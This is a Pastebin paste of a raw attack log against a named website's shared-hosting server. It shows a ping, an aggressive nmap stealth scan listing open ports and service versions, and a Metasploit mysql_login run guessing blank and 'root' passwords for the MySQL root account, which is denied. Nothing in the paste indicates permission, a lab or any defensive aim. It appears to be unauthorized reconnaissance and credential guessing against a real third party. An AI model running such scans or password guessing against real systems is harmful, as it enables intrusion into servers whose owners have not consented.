Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- lionsec-l3@ubuntu:~$ ping www.micesony.com
- PING micesony.com (108.179.252.199) 56(84) bytes of data.
- ============
- root@ubuntu:/home/lionsec-l3# nmap -sS -sV 108.179.252.199 -O --version-intensity 9 -vv
- Starting Nmap 6.40 ( http://nmap.org ) at 2016-04-25 03:18 BRT
- NSE: Loaded 23 scripts for scanning.
- Initiating Ping Scan at 03:18
- Scanning 108.179.252.199 [4 ports]
- Completed Ping Scan at 03:18, 0.06s elapsed (1 total hosts)
- Initiating Parallel DNS resolution of 1 host. at 03:18
- Completed Parallel DNS resolution of 1 host. at 03:18, 0.01s elapsed
- Initiating SYN Stealth Scan at 03:18
- Scanning br546-ip05.hostgator.com.br (108.179.252.199) [1000 ports]
- Discovered open port 80/tcp on 108.179.252.199
- Discovered open port 587/tcp on 108.179.252.199
- Discovered open port 3306/tcp on 108.179.252.199
- Discovered open port 443/tcp on 108.179.252.199
- Discovered open port 25/tcp on 108.179.252.199
- Discovered open port 8080/tcp on 108.179.252.199
- Discovered open port 110/tcp on 108.179.252.199
- Discovered open port 993/tcp on 108.179.252.199
- Discovered open port 995/tcp on 108.179.252.199
- Discovered open port 21/tcp on 108.179.252.199
- Discovered open port 53/tcp on 108.179.252.199
- Discovered open port 143/tcp on 108.179.252.199
- Discovered open port 2222/tcp on 108.179.252.199
- SYN Stealth Scan Timing: About 36.10% done; ETC: 03:20 (0:00:57 remaining)
- Discovered open port 26/tcp on 108.179.252.199
- Discovered open port 465/tcp on 108.179.252.199
- SYN Stealth Scan Timing: About 65.35% done; ETC: 03:20 (0:00:41 remaining)
- Discovered open port 8443/tcp on 108.179.252.199
- Completed SYN Stealth Scan at 03:20, 126.35s elapsed (1000 total ports)
- Initiating Service scan at 03:20
- Scanning 16 services on br546-ip05.hostgator.com.br (108.179.252.199)
- Completed Service scan at 03:21, 29.47s elapsed (16 services on 1 host)
- Initiating OS detection (try #1) against br546-ip05.hostgator.com.br (108.179.252.199)
- Retrying OS detection (try #2) against br546-ip05.hostgator.com.br (108.179.252.199)
- sendto in send_ip_packet_sd: sendto(5, packet, 60, 0, 108.179.252.199, 16) => Network is unreachable
- Offending packet: TCP 192.168.211.137:43604 > 108.179.252.199:21 S ttl=53 id=62456 iplen=60 seq=818366373 win=1 <wscale 10,nop,mss 1460,timestamp 4294967295 0,sackOK>
- sendto in send_ip_packet_sd: sendto(5, packet, 60, 0, 108.179.252.199, 16) => Network is unreachable
- Offending packet: TCP 192.168.211.137:43605 > 108.179.252.199:21 S ttl=44 id=5295 iplen=60 seq=818366374 win=63 <mss 1400,wscale 0,sackOK,timestamp 4294967295 0,eol>
- sendto in send_ip_packet_sd: sendto(5, packet, 60, 0, 108.179.252.199, 16) => Network is unreachable
- Offending packet: TCP 192.168.211.137:43606 > 108.179.252.199:21 S ttl=58 id=35458 iplen=60 seq=818366375 win=4 <timestamp 4294967295 0,nop,nop,wscale 5,nop,mss 640>
- sendto in send_ip_packet_sd: sendto(5, packet, 56, 0, 108.179.252.199, 16) => Network is unreachable
- Offending packet: TCP 192.168.211.137:43607 > 108.179.252.199:21 S ttl=42 id=49445 iplen=56 seq=818366376 win=4 <sackOK,timestamp 4294967295 0,wscale 10,eol>
- sendto in send_ip_packet_sd: sendto(5, packet, 60, 0, 108.179.252.199, 16) => Network is unreachable
- Offending packet: TCP 192.168.211.137:43608 > 108.179.252.199:21 S ttl=53 id=2768 iplen=60 seq=818366377 win=16 <mss 536,sackOK,timestamp 4294967295 0,wscale 10,eol>
- sendto in send_ip_packet_sd: sendto(5, packet, 56, 0, 108.179.252.199, 16) => Network is unreachable
- Offending packet: TCP 192.168.211.137:43609 > 108.179.252.199:21 S ttl=52 id=33426 iplen=56 seq=818366378 win=512 <mss 265,sackOK,timestamp 4294967295 0>
- sendto in send_ip_packet_sd: sendto(5, packet, 148, 0, 108.179.252.199, 16) => Network is unreachable
- Offending packet: ICMP [192.168.211.137 > 108.179.252.199 Echo request (type=8/code=9) id=51695 seq=295] IP [ttl=53 id=18033 iplen=148 ]
- sendto in send_ip_packet_sd: sendto(5, packet, 178, 0, 108.179.252.199, 16) => Network is unreachable
- Offending packet: ICMP [192.168.211.137 > 108.179.252.199 Echo request (type=8/code=0) id=51696 seq=296] IP [ttl=46 id=15626 iplen=178 ]
- sendto in send_ip_packet_sd: sendto(5, packet, 328, 0, 108.179.252.199, 16) => Network is unreachable
- Offending packet: UDP 192.168.211.137:43680 > 108.179.252.199:42604 ttl=62 id=4162 iplen=328
- send_ip_packet in send_closedudp_probe: Network is unreachable (101)
- sendto in send_ip_packet_sd: sendto(5, packet, 60, 0, 108.179.252.199, 16) => Network is unreachable
- Offending packet: TCP 192.168.211.137:43610 > 108.179.252.199:21 S ttl=40 id=57916 iplen=60 seq=818366373 win=1 <wscale 10,nop,mss 1460,timestamp 4294967295 0,sackOK>
- Omitting future Sendto error messages now that 10 have been shown. Use -d2 if you really want to see them.
- send_ip_packet in send_closedudp_probe: Network is unreachable (101)
- NSE: Script scanning 108.179.252.199.
- NSE: Starting runlevel 1 (of 1) scan.
- Initiating NSE at 03:22
- Completed NSE at 03:22, 15.43s elapsed
- Nmap scan report for br546-ip05.hostgator.com.br (108.179.252.199)
- Host is up (0.32s latency).
- Scanned at 2016-04-25 03:18:32 BRT for 233s
- Not shown: 981 closed ports
- PORT STATE SERVICE VERSION
- 21/tcp open ftp Pure-FTPd
- 22/tcp filtered ssh
- 25/tcp open smtp Exim smtpd 4.86_1
- 26/tcp open smtp Exim smtpd 4.86_1
- 53/tcp open domain
- 80/tcp open http nginx 1.8.1
- 110/tcp open pop3 Dovecot pop3d
- 143/tcp open imap Dovecot imapd
- 443/tcp open ssl/http Apache httpd
- 465/tcp open smtps?
- 514/tcp filtered shell
- 587/tcp open smtp Exim smtpd 4.86_1
- 646/tcp filtered ldp
- 993/tcp open ssl/imap Dovecot imapd
- 995/tcp open ssl/pop3 Dovecot pop3d
- 2222/tcp open ssh OpenSSH 5.3 (protocol 2.0)
- 3306/tcp open mysql MySQL 5.5.40-36.1
- 8080/tcp open http nginx 1.8.1
- 8443/tcp open http nginx 1.8.1
- Device type: general purpose|storage-misc
- Running (JUST GUESSING): Microsoft Windows 7|XP (92%), Linux 2.4.X|3.X (90%), BlueArc embedded (85%)
- OS CPE: cpe:/o:microsoft:windows_7:::enterprise cpe:/o:microsoft:windows_xp::sp3 cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:3 cpe:/h:bluearc:titan_2100
- OS fingerprint not ideal because: Didn't receive UDP response. Please try again with -sSU
- Aggressive OS guesses: Microsoft Windows 7 Enterprise (92%), Microsoft Windows XP SP3 (92%), DD-WRT v24-sp2 (Linux 2.4.37) (90%), Linux 3.2 (90%), BlueArc Titan 2100 NAS device (85%)
- No exact OS matches for host (test conditions non-ideal).
- TCP/IP fingerprint:
- SCAN(V=6.40%E=4%D=4/25%OT=21%CT=1%CU=%PV=N%G=N%TM=571DB7A1%P=x86_64-unknown-linux-gnu)
- SEQ(CI=RI%TS=U)
- SEQ(CI=I)
- OPS(O1=M5B4%O2=%O3=%O4=%O5=%O6=)
- WIN(W1=FAF0%W2=FAF0%W3=FAF0%W4=FAF0%W5=FAF0%W6=FAF0)
- ECN(R=Y%DF=N%TG=80%W=FAF0%O=%CC=N%Q=)
- T1(R=Y%DF=N%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
- T2(R=N)
- T3(R=Y%DF=N%TG=80%W=FAF0%S=O%A=S+%F=AR%O=%RD=0%Q=)
- T4(R=Y%DF=N%TG=80%W=7FFF%S=A%A=Z%F=R%O=%RD=0%Q=)
- T5(R=Y%DF=N%TG=80%W=FAF0%S=O%A=S+%F=AR%O=%RD=0%Q=)
- T6(R=Y%DF=N%TG=80%W=7FFF%S=A%A=Z%F=R%O=%RD=0%Q=)
- T7(R=N)
- U1(R=N)
- IE(R=N)
- Service Info: Host: br546.hostgator.com.br
- Read data files from: /usr/bin/../share/nmap
- OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 233.99 seconds
- Raw packets sent: 1150 (54.568KB) | Rcvd: 1097 (43.977KB)
- =============================
- msf auxiliary(mysql_login) > exploit
- [*] 108.179.252.199:3306 MYSQL - Found remote MySQL version 5.5.40
- [*] 108.179.252.199:3306 MYSQL - [1/2] - Trying username:'root' with password:''
- [-] Access
- [*] 108.179.252.199:3306 MYSQL - [2/2] - Trying username:'root' with password:'root'
- [-] Access
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement